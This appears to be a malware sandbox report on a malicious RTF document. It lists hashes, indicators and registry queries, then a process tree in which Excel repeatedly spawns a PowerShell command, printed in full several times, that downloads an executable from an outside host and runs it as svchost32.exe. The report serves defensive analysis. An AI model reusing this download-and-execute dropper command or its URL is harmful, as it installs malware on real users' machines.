6f3a8557e2c95a717cb48080042293045011e74f2a4c79aaeffbfcc86456eb37

Analysis

max time kernel
126s
max time network
128s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
14/08/2024, 11:46

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

95f99d56a855cc512949de89564ab528_JaffaCakes118.rtf
Size

665KB
MD5

95f99d56a855cc512949de89564ab528
SHA1

84f1c68a05d7acc4d46546c055a1fa61147e704b
SHA256

6f3a8557e2c95a717cb48080042293045011e74f2a4c79aaeffbfcc86456eb37
SHA512

7b72f3fe88d0e54f148d91f5a2afcdf5f467951e798115764c9a3e18a46921c065aec6ee5f00f9010235df1b0352ce5a596581fa5e09a7b4c4aec61e2c3b69fc
SSDEEP

6144:AcJX2HXPVJQIiYA41yfdmc8WElI4rLwkA6/yHJoi59CmI:6H9JQXYGsc8W143nGHJ3iH

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://fast-cargo.com/images/file/39.exe

Signatures

Process spawned unexpected child process 10 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3600	1368	powershell.exe	84
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4148	1256	powershell.exe	95
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2428	664	powershell.exe	100
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4348	4312	powershell.exe	104
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2352	2460	powershell.exe	107
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1368	4416	powershell.exe	111
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1248	4868	powershell.exe	116
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4952	3896	powershell.exe	126
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4928	3764	powershell.exe	129
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1968	4068	powershell.exe	132

Blocklisted process makes network request 10 IoCs

flow	pid	Process
19	3600	powershell.exe
51	4148	powershell.exe
56	2428	powershell.exe
68	4348	powershell.exe
73	2352	powershell.exe
86	1368	powershell.exe
94	1248	powershell.exe
111	4952	powershell.exe
115	4928	powershell.exe
120	1968	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3600	powershell.exe
4148	powershell.exe
2428	powershell.exe
2352	powershell.exe
1248	powershell.exe
4928	powershell.exe
4348	powershell.exe
1368	powershell.exe
4952	powershell.exe
1968	powershell.exe
1968	powershell.exe
3600	powershell.exe
4348	powershell.exe
2352	powershell.exe
4952	powershell.exe
4928	powershell.exe
4148	powershell.exe
2428	powershell.exe
1368	powershell.exe
1248	powershell.exe

Checks processor information in registry 2 TTPs 63 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe

Enumerates system info in registry 2 TTPs 63 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
2640	WINWORD.EXE
2640	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
3600	powershell.exe
3600	powershell.exe
4148	powershell.exe
4148	powershell.exe
4148	powershell.exe
2428	powershell.exe
2428	powershell.exe
2428	powershell.exe
4348	powershell.exe
4348	powershell.exe
4348	powershell.exe
2352	powershell.exe
2352	powershell.exe
1368	powershell.exe
1368	powershell.exe
1368	powershell.exe
1248	powershell.exe
1248	powershell.exe
1248	powershell.exe
4952	powershell.exe
4952	powershell.exe
4952	powershell.exe
4928	powershell.exe
4928	powershell.exe
4928	powershell.exe
1968	powershell.exe
1968	powershell.exe
1968	powershell.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	3600	powershell.exe
Token: SeDebugPrivilege	4148	powershell.exe
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeDebugPrivilege	4348	powershell.exe
Token: SeDebugPrivilege	2352	powershell.exe
Token: SeDebugPrivilege	1368	powershell.exe
Token: SeDebugPrivilege	1248	powershell.exe
Token: SeDebugPrivilege	4952	powershell.exe
Token: SeDebugPrivilege	4928	powershell.exe
Token: SeDebugPrivilege	1968	powershell.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
2640	WINWORD.EXE
2640	WINWORD.EXE
2640	WINWORD.EXE
1368	EXCEL.EXE
1368	EXCEL.EXE
1368	EXCEL.EXE
1368	EXCEL.EXE
1368	EXCEL.EXE
1368	EXCEL.EXE
1368	EXCEL.EXE
1256	EXCEL.EXE
1256	EXCEL.EXE
1256	EXCEL.EXE
1256	EXCEL.EXE
1256	EXCEL.EXE
1256	EXCEL.EXE
1256	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
4312	EXCEL.EXE
4312	EXCEL.EXE
4312	EXCEL.EXE
4312	EXCEL.EXE
4312	EXCEL.EXE
4312	EXCEL.EXE
4312	EXCEL.EXE
2460	EXCEL.EXE
2460	EXCEL.EXE
2460	EXCEL.EXE
2460	EXCEL.EXE
2460	EXCEL.EXE
2460	EXCEL.EXE
2460	EXCEL.EXE
4416	EXCEL.EXE
4416	EXCEL.EXE
4416	EXCEL.EXE
4416	EXCEL.EXE
4416	EXCEL.EXE
4416	EXCEL.EXE
4416	EXCEL.EXE
4868	EXCEL.EXE
4868	EXCEL.EXE
4868	EXCEL.EXE
4868	EXCEL.EXE
4868	EXCEL.EXE
4868	EXCEL.EXE
4868	EXCEL.EXE
3896	EXCEL.EXE
3896	EXCEL.EXE
3896	EXCEL.EXE
3896	EXCEL.EXE
3896	EXCEL.EXE
3896	EXCEL.EXE
3896	EXCEL.EXE
3764	EXCEL.EXE
3764	EXCEL.EXE
3764	EXCEL.EXE
3764	EXCEL.EXE
3764	EXCEL.EXE

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1368 wrote to memory of 3600	1368	EXCEL.EXE	88
PID 1368 wrote to memory of 3600	1368	EXCEL.EXE	88
PID 1256 wrote to memory of 4148	1256	EXCEL.EXE	96
PID 1256 wrote to memory of 4148	1256	EXCEL.EXE	96
PID 664 wrote to memory of 2428	664	EXCEL.EXE	101
PID 664 wrote to memory of 2428	664	EXCEL.EXE	101
PID 4312 wrote to memory of 4348	4312	EXCEL.EXE	105
PID 4312 wrote to memory of 4348	4312	EXCEL.EXE	105
PID 2460 wrote to memory of 2352	2460	EXCEL.EXE	108
PID 2460 wrote to memory of 2352	2460	EXCEL.EXE	108
PID 4416 wrote to memory of 1368	4416	EXCEL.EXE	112
PID 4416 wrote to memory of 1368	4416	EXCEL.EXE	112
PID 4868 wrote to memory of 1248	4868	EXCEL.EXE	117
PID 4868 wrote to memory of 1248	4868	EXCEL.EXE	117
PID 3896 wrote to memory of 4952	3896	EXCEL.EXE	127
PID 3896 wrote to memory of 4952	3896	EXCEL.EXE	127
PID 3764 wrote to memory of 4928	3764	EXCEL.EXE	130
PID 3764 wrote to memory of 4928	3764	EXCEL.EXE	130
PID 4068 wrote to memory of 1968	4068	EXCEL.EXE	133
PID 4068 wrote to memory of 1968	4068	EXCEL.EXE	133

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\95f99d56a855cc512949de89564ab528_JaffaCakes118.rtf" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2640

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1368
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/39.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3600

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1256
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/39.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4148

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:664
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/39.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2428

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4312
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/39.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4348

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2460
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/39.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2352

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4416
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/39.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1368

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/39.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1248

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/39.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4952

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
